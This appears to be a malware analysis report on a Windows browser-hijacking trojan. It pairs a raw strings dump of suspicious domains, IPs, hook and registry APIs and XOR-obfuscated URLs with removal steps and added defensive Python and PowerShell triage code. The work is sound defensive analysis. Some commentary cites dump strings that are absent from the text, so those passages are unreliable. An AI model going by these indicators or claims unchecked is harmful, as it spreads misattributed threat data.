ddh111.com
9599qq.com
9599112.com
taotietem.com
95996868.cc
9955sbd.com
hainei.org
95996868.com
yl882288.com
6677.us
yinhemmm.com
VVV.478009.com
qpl777.com
ylg8999.com
VVV.365445.com
aibo68.com
w88top.com
aobo00.com
8800y9.com
hd9599.com
VVV.56666.net
ji586987.com
95993333.cc
milan86.com
ylg9099.com
blm0000.com
VVV.bmw7.com
VVV.ca151.com
ad.517dapai.com
59bo.com
VVV.b22138.com
VVV.4662.com
VVV.23456.com
VVV.anhui365.net
ylg9999.com
newbet6.com
VVV.mg123.cm
tlc187.com
VVV.sdw11.com
dhy0022.com
991991.cc
VVV.mr007.com
yo56378.com
fa74955.com
VVV.0177.com
6767385.com
9663553.com
youle44.com
cate.syd.com.cn
feibodr111.com
usot399555.cn
88jt09.com
y8b88.com
006yth.com
0112828.com
VVV.0951wx.com
VVV.187203.com
1hgp.com
VVV.224499.com
3067k.com
365bet.mobi
4213333.cc
VVV.61cctv.com
81808188.com
VVV.87top.com
VVV.8edy.com
VVV.8k018.com
VVV.91bcd.com
94bo.net
9910z.com
VVV.am11.com
VVV.bebio.net.cn
VVV.bg33k.com
blr0088.com
boan83.com
VVV.cd-cszs.com
chinabreed.com
VVV.cn-ady.com
VVV.co1860.com
VVV.cqqggqw.com
VVV.cs0759.com
dhy8855.com
dqxswzxd.com
echina365.com
feibo4.com
VVV.fmu8.com
VVV.hi688.net
hjzs888.com
VVV.ht51.com
VVV.j331.com
jin5088.com
jkg1.cc
VVV.kefu68.com
VVV.kl-cti.com
VVV.kur99.com
VVV.meihuale.com
VVV.mngye.com
VVV.mph4.cn
n0178.com
VVV.nxbyjt.com
VVV.pgpop.com
VVV.qoyari.com
VVV.ranshao.com
VVV.safea.gov.cn
sanrasoft.com
VVV.sctv.com.cn
VVV.sopoer.com
VVV.t1889.com
t5252.com
VVV.tjjsd.com
VVV.v524.com
v8293.com
VVV.vic5.com
vtm006.com
VVV.wj880.com
wns0028.com
VVV.xy306.com
yb633.com
ying993.com
VVV.yqjnt.com
www-55977.com
www-80999.com
olog648.top
zcxtzx.com
3040168.com
baitafengshui.com
xhnjt.cc
47.89.59.67
021sjjc.com
wy.92wy.com
99j.com
66169.com
91yidao.com
mishicq.com
8090cqg.com
860580.com
345zx.com
VVV.melaleuca.com.cn
45woool.com
hhgft.com
eachinfo.com
ucbug.com
VVV.44tf.com
haof.44tf.com
sfacg.com
xyxzgw.com
121.41.16.196
941pojie.com
162.212.181.20
93yd.com
haofupk.com
99inf.com
VVV.ssswm.com
s1904.com
99ting.cn
VVV.wowms.com
mc520.com
VVV.wan50.com
VVV.wf998.com
20shopping.com
net.17ycw.cn
1234567edu.com
183.60.197.153
VVV.559u.com
VVV.wg941.com
tg.mshax.com
taitognpump.com
121.40.239.48
52345.cn
921pt.com
52anzu.com
122.224.33.49
xingzhaohao.com
30ok.com
haosf.me
haosf.ws
99s.com
huzu123.com
268pk.cn
520jdwg.com
s.h1995.com
VVV.54dc.com
cqhaobangshou.com
haosf.tv
swufe.net
shutu.cc
54zz.com
markosweb.com
33sf.com
44145.wang
44134.wang
192yx.com
shenqi.com
175sf.com
sf999.com
fu.juyhf.com
2688tc.com
grrfg.com
sf822.com
rxjh45.com
zhaosf.mobi
zhaowoool.com
sewsx.com
015999.com
VVV.93u.com
ditulao.com
sf999.ws
shangjz.com
cydfh.com
zhoupuinc.com
zmdsnjtgw.com
cqw6.com
hangzhou.aliyuncs.com
zlyzpw.com
uu171.com
cuwoool.cn
1778st.com
183.131.85.133
18wanmei.com
72714.wang
9kf.com
bibuzhengrong.com
cq697.com
d34dd.com
dj665.com
kofbobo.net
kongzhifamen.com
wanwan88.com
VVV.97mc.com
VVV.qiqiweb.com
VVV.vivi2.com
wxyongshang.com
zhaokf.com
zhaosf.cc
sf123uu.com
{844D7191-2FEF-4d2b-AB06-718517B0BFC5}
{684EF56E-2FAE-4ed2-BF46-F0440C5BE24F}
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
sfc.exe
sort.exe
taskkill.exe
timeout.exe
wininit.exe
xcopy.exe
netsh.exe
notepad.exe
regedit.exe
reg.exe
rundll32.exe
cmd.exe
{60853F8B-2218-49CF-A58D-2561B9550406}
0.0.0.0
TMyIdTCPServerEventCalll
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
.hao123.com
2345.5636lm.com
VVV.baidu.com/
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
TMyCheckOpenUrl
TDRIVER_UrlWatchList
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
play.bat
hXXps://123.sogou.com/?71156-5497
b~~z0%%cz$ik~x$id%
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
hinthk.dll
Err HTTPS RHP...
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
inflate 1.2.8 Copyright 1995-2013 Mark Adler
-j}g "@n
.NevP
.Jw04
;3 #>6.&
'2, / 0&7!4-)1#
77771111
>=<;:9876543210/.-, *)('&%$#"!
%sNg_[pn
@%C*G:P
W.OdB#zvd
xTh^.ye
}mC•c
:S%9s
%Uv3:
z>.VZ
=\.RT
u{.as>
276!!@~9
wh&%dSh
|R.TX~`x2
x).AK
re%ds
cCc.IG
M{`E>%S
`.iT&~
!y.Fy
pkEY
.YL`f
Œm%
`].eJ
.sj`A
Gr.Bm@j>
p@.glp:
?456789:;<=
!"#$%&'()* ,-./0123
C:\Windows\hlog.txt
2016-11-22
07:46:34
07:46:30
test url...
07:46:31
Lv;AKv.AKv
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
GetExtendedTcpTable
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
IdTCPStream
 IdTCPServer
UrlMon
MyHTTPSProxyRF
0IdHTTPHeaderInfo
<requestedExecutionLevel level="requireAdministrator"/>
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(
-( ,''.-!$$$&'(/*) ,*/.)*72-9
, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-, ,-,
87\22,-!'
License information for %s not found. You cannot use this control in design mode
Unable to retrieve a pointer to a running object registered with OLE for %s/%s
Instruction TLB, 4Kb pages, 4-way set associative, 32 entries
Instruction TLB, 4Mb pages, fully associative, 2 entries
Data TLB, 4Kb pages, 4-way set associative, 64 entries
Data TLB, 4Mb pages, 4-way set associative, 8 entries
8KB instruction cache, 4-way set associative, 32 byte line size
16KB instruction cache, 4-way set associative, 32 byte line size
8KB data cache 2-way set associative, 32 byte line size
16KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed
Could not obtain OLE control window handle
License information for %s is invalid
Alt
Clipboard does not support Icons
Menu '%s' is already being used by another form
No help found for %s
No context-sensitive help installed
No topic-based help system installed
Error creating window class
Cannot focus a disabled or invisible window
Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid
Cannot change the size of an icon
Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.
Error accepting connection with SSL.
Error creating SSL context.
Could not load root certificate.
Could not load certificate.
Could not load key, check password.
Request rejected or failed.
Request rejected because SOCKS server cannot connect.
Request rejected because the client program and identd report different user-ids.
Socket type not supported.
Operation not supported on socket.
Protocol family not supported.
Address family not supported by protocol family.
Socket is not connected.
Cannot send or receive after socket is closed.
Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.
Error on call Winsock2 library function %s
Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk Started
This authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found
Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.
Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented
Operation not allowed on sorted list
%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x
Method '%s' not supported by automation object
Variant does not reference an automation object
Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.
Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)
''%s'' is not a valid component name
Invalid data type for '%s'
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range
Can't write to a read-only resource stream
CheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists
List does not allow duplicates ($0%x)
A component named %s already exists
String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error
Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Format '%s' invalid or incompatible with argument
No argument for format '%s'
Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation
Invalid variant operation (%s%.8x)
%s
Could not convert variant of type (%s) into type (%s)
Overflow while converting variant of type (%s) into type (%s)
Integer overflow
Invalid floating point operation
Invalid pointer operation
Invalid class typecast
Access violation at address %p. %s of address %p
Privileged instruction
Exception %s in module %s at %p.
'%s' is not a valid integer value
'%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time
'%s' is not a valid date and time
I/O error %d
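Several strings in the 86ae56633941c20e9a65a719b5a2208.exe_2388 dump above are not plain text: the b~~z0%% strings, the two Ínor% strings, mk~$ieg%ss and mk~2$idþf. Each is a URL fragment XORed with a single byte. The following is an added analyst-side example, not code from the sample or from the report. It recovers the key from one assumption, that the b~~z0%% strings begin with http:// (a crib; the report states no key), and then decodes every string with that key. Under that crib the key comes out as 0x0A, so for instance b~~z0%%cz$ndyorc~$ieg% reads http://ip.dnsexit.com/ and b~~z0%%xoieggodn$r reads http://recommend.x. The non-ASCII characters Í and þ are extraction damage in the dump, so those positions decode to '?'.

```python
"""Recover the single-byte XOR key behind the obfuscated strings in the dump.

Added analyst-side example; not code from the sample or the report. The
sample strings are copied from the dump above; the key is an inference
recovered from the crib, not a value the report states anywhere.
"""

CRIB = "http://"  # assumed plaintext prefix of the "b~~z0%%..." strings


def recover_key(cipher: str, crib: str = CRIB):
    """Return the XOR key implied by the crib, or None if no single byte fits.

    Every crib position must agree on the same key; otherwise the string is
    either not a URL or not single-byte XOR.
    """
    if len(cipher) < len(crib):
        return None
    key = ord(cipher[0]) ^ ord(crib[0])
    for c, p in zip(cipher, crib):
        if ord(c) ^ key != ord(p):
            return None
    return key


def decode(cipher: str, key: int) -> str:
    """XOR each character with key; anything outside printable ASCII becomes '?'.

    Characters above 0x7F in the dump (e.g. 'Í') are extraction damage, so
    the decoded byte at that position is unknown and shown as '?'.
    """
    out = []
    for c in cipher:
        b = ord(c) ^ key
        out.append(chr(b) if 0x20 <= b <= 0x7E else "?")
    return "".join(out)


# Copied from the dump above (Í is reproduced as the dump shows it).
SAMPLES = [
    "b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7",
    "Ínor%o|od~",
    "Ínor%nk~k",
    "mk~$ieg%ss",
    "b~~z0%%}}}$bkeye",
    "b~~z0%%xoieggodn$r",
    "b~~z0%%cz$ik~x$id%",
    "b~~z0%%cz$ndyorc~$ieg%",
]


def decode_all(samples=SAMPLES, crib: str = CRIB):
    """Recover the key from the crib-bearing strings, then decode every string.

    Returns (key, [(cipher, plain), ...]). key is None if no string carries
    the crib or if the crib-bearing strings disagree on the key.
    """
    keys = {k for k in (recover_key(s, crib) for s in samples) if k is not None}
    if len(keys) != 1:
        return None, []
    key = keys.pop()
    return key, [(s, decode(s, key)) for s in samples]


if __name__ == "__main__":
    key, pairs = decode_all()
    print(f"key = 0x{key:02x}")
    for cipher, plain in pairs:
        print(f"{cipher!r:45} -> {plain}")
```

Strings that do not carry the crib (the mk~ and Ínor% ones) are decoded with the key recovered from the ones that do; a decoded value containing '?' had an undecodable byte in the dump and should be treated as a partial hostname rather than searched for verbatim.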

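The same dump carries a long run of wildcard patterns (*VVV.tyc[0-9].com* through *bet[0-9][0-9][0-9].com*), followed by bare hostnames and URL prefixes, and a class name TDRIVER_UrlWatchList a little further down. Together these look like a list the sample compares visited URLs against. The following is an added example, not code from the sample or the report: it reverses the report's defanging (VVV. for www., hXXp for http), compiles the wildcard entries as shell-style globs, and reports which entries a given URL hits. That the sample matches globs against the full URL is an assumption. One edge case matters: '?' inside the literal entries is a query-string marker, not a glob wildcard, so only '*' and '[' are treated as marking a glob; and two of the hg patterns in the dump have no trailing '*', so they only match a URL that ends in .com, which the example preserves rather than corrects.

```python
"""Turn the defanged URL watch-list strings from the dump into a matcher.

Added analyst-side example, not code from the sample or the report. The
entries below are copied from the dump (a subset). Globs are matched against
the whole URL; that is an assumption about the sample's behaviour.
"""
import re
from fnmatch import translate
from urllib.parse import urlsplit

WATCH_LIST = [
    "*VVV.tyc[0-9].com*",
    "*VVV.tyc[0-9][0-9].com*",
    "*hg[0-9][0-9][0-9][0-9].com*",
    "*VVV.hg[0-9][0-9].com",             # no trailing '*' in the dump
    "*bet[0-9][0-9][0-9].com*",
    "VVV.hao123.com/?tn=",                # URL prefix, '?' is literal here
    "hXXps://123.sogou.com/?71163-0897",  # full URL with scheme
    "index.hao2016.net",                  # bare hostname
    "42.62.30.180",
]

_DEFANG = [("VVV.", "www."), ("hXXp", "http")]


def refang(entry: str) -> str:
    """Undo the report's defanging so entries compare against real URLs."""
    for bad, good in _DEFANG:
        entry = entry.replace(bad, good)
    return entry


def is_glob(entry: str) -> bool:
    """Only '*' and '[' mark a glob; '?' in this list is a query-string marker."""
    return "*" in entry or "[" in entry


class WatchList:
    """Globs match the whole URL; literal entries match host, prefix or full URL."""

    def __init__(self, entries):
        self.globs = []     # (entry as written in the dump, compiled regex)
        self.literals = []  # (entry as written in the dump, refanged lowercase)
        for e in entries:
            if is_glob(e):
                self.globs.append((e, re.compile(translate(refang(e)), re.IGNORECASE)))
            else:
                self.literals.append((e, refang(e).lower()))

    def matches(self, url: str):
        """Return the watch-list entries (as written in the dump) that the URL hits."""
        hits = []
        u = url.lower()
        host = urlsplit(u).hostname or ""
        bare = u.split("://", 1)[-1]  # URL without scheme, for prefix entries
        for entry, rx in self.globs:
            if rx.match(u):  # translate() anchors the pattern at both ends
                hits.append(entry)
        for entry, lit in self.literals:
            if "://" in lit:
                if u.startswith(lit):
                    hits.append(entry)
            elif "/" in lit:
                if bare.startswith(lit):
                    hits.append(entry)
            elif host == lit or host.endswith("." + lit):
                hits.append(entry)
        return hits


def check_urls(urls, entries=WATCH_LIST):
    """Map each URL to the list of entries it hits (empty list = no match)."""
    wl = WatchList(entries)
    return {u: wl.matches(u) for u in urls}


if __name__ == "__main__":
    probes = [  # constructed test URLs, not observed traffic
        "http://www.tyc8.com/index.html",
        "http://www.hg12.com",
        "http://www.hg12.com/",
        "https://www.hao123.com/?tn=96012662_hao_pg",
        "http://sub.index.hao2016.net/x",
    ]
    for url, hits in check_urls(probes).items():
        print(f"{url:45} -> {hits or 'no match'}")
```

Because the dump's hostname entries are matched as a suffix on the host (index.hao2016.net also hits sub.index.hao2016.net) while the prefix entries are matched on the URL without its scheme, a proxy log can be run through check_urls as-is to see which of the report's indicators a host actually touched.
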
SearchFilterHost.exe_2516:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3884

  3. Delete the original Trojan file.
  4. Delete the files the Trojan dropped, and inspect the existing files it modified. The entries under the user profile (the pinned browser shortcuts, the Firefox cache and safebrowsing data, the Web Slice Gallery favourite) appear to be legitimate files the sample wrote to rather than components of its own: check that each .lnk still points at the real browser executable and let the browser rebuild its cache, instead of deleting them blindly. Files created/modified by the Trojan:

    C:\Windows\System32\20ed6a\CDClient_EX.sys (125 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Windows\YbfHFk\iAFqcX.dll (15859 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Windows\YbfHFk\NLVhhEmUa.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Windows\YbfHFk\DvMtvJIVG.dll (279 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Windows\xEQSlj.dll (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Windows\hlog.txt (981 bytes)
    C:\Windows\inplMsoI.dll (13 bytes)
    C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe (7930 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
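Before deleting anything by hand it is worth confirming which of the listed artifacts are actually present on the host and what state they are in. The script below is an added triage example, not part of the Lavasoft report: it sweeps the paths from the file list above, hashes what it finds, reads the targets of the modified browser shortcuts, and checks whether the dropped driver is registered and whether the ProgramData copy of the sample is running. It assumes an elevated PowerShell 4 or later (Windows Management Framework 4 on Windows 7), and it deliberately skips the Firefox cache and Favorites entries, which carry no useful hashes. The "suspect" test on shortcut targets is a heuristic of this example, not something the report states. Nothing is deleted.

```powershell
# Added triage example (not part of the Lavasoft report): check a Windows host for the
# artifacts listed in the manual removal section before touching anything.
# Assumptions: elevated PowerShell 4+ on the suspect host (Get-FileHash needs PS 4;
# on PowerShell 2.0 replace Get-CimInstance with Get-WmiObject). Paths are the report's.

$ErrorActionPreference = 'SilentlyContinue'
$userProfile = $env:USERPROFILE

# Files the report says the sample created under %SystemRoot% and %ProgramData%.
$droppedPaths = @(
    'C:\Windows\System32\20ed6a\CDClient_EX.sys',
    'C:\Windows\YbfHFk\iAFqcX.dll',
    'C:\Windows\YbfHFk\DvMtvJIVG.dll',
    'C:\Windows\YbfHFk\NLVhhEmUa.tmp',
    'C:\Windows\xEQSlj.dll',
    'C:\Windows\inplMsoI.dll',
    'C:\Windows\CLOG.txt',
    'C:\Windows\hlog.txt',
    'C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe'
)

# Browser shortcuts the sample wrote to. These are legitimate files it modified, so the
# check reads their targets instead of deleting them.
$shortcutPaths = @(
    "$userProfile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk",
    "$userProfile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk",
    "$userProfile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk",
    "$userProfile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk",
    "$userProfile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
)

$findings = @()

# 1. Dropped files: record size and SHA-256 so they can be compared with the report
#    and submitted for analysis before removal.
foreach ($p in $droppedPaths) {
    if (Test-Path -LiteralPath $p) {
        $item = Get-Item -LiteralPath $p
        $hash = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $findings += [pscustomobject]@{ Kind = 'DroppedFile'; Path = $p; Size = $item.Length; Detail = $hash }
    }
}

# 2. Shortcut targets: flag (heuristic of this example) any target that does not resolve
#    under Program Files, Program Files (x86) or the Windows directory.
$shell = New-Object -ComObject WScript.Shell
foreach ($lnk in $shortcutPaths) {
    if (Test-Path -LiteralPath $lnk) {
        $sc = $shell.CreateShortcut($lnk)
        $target = $sc.TargetPath
        $expected = ($target -like "${env:ProgramFiles}*") -or
                    ($target -like "${env:ProgramFiles(x86)}*") -or
                    ($target -like "${env:windir}*")
        $findings += [pscustomobject]@{
            Kind = 'Shortcut'; Path = $lnk; Size = (Get-Item -LiteralPath $lnk).Length
            Detail = "target=$target args=$($sc.Arguments) suspect=$(-not $expected)"
        }
    }
}

# 3. The dropped .sys: is it registered as a driver, and is it running? A loaded driver
#    is why step 1 of the manual removal calls for an anti-rootkit scan first.
Get-CimInstance Win32_SystemDriver |
    Where-Object { $_.PathName -like '*20ed6a\CDClient_EX.sys*' } |
    ForEach-Object {
        $findings += [pscustomobject]@{ Kind = 'Driver'; Path = $_.PathName; Size = $null
                                        Detail = "name=$($_.Name) state=$($_.State) start=$($_.StartMode)" }
    }

# 4. The ProgramData copy of the sample running as a process (step 2 of the removal).
Get-Process | Where-Object { $_.Path -like 'C:\ProgramData\prjNVt\*' } | ForEach-Object {
    $findings += [pscustomobject]@{ Kind = 'Process'; Path = $_.Path; Size = $null; Detail = "pid=$($_.Id)" }
}

$findings | Format-Table -AutoSize
```

Run it once before removal to record what is present, and again after the reboot in step 6 to confirm the dropped files, the driver registration and the ProgramData process are gone. A shortcut whose target resolves somewhere other than the browser's install directory should be restored from a known-good copy rather than edited in place.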
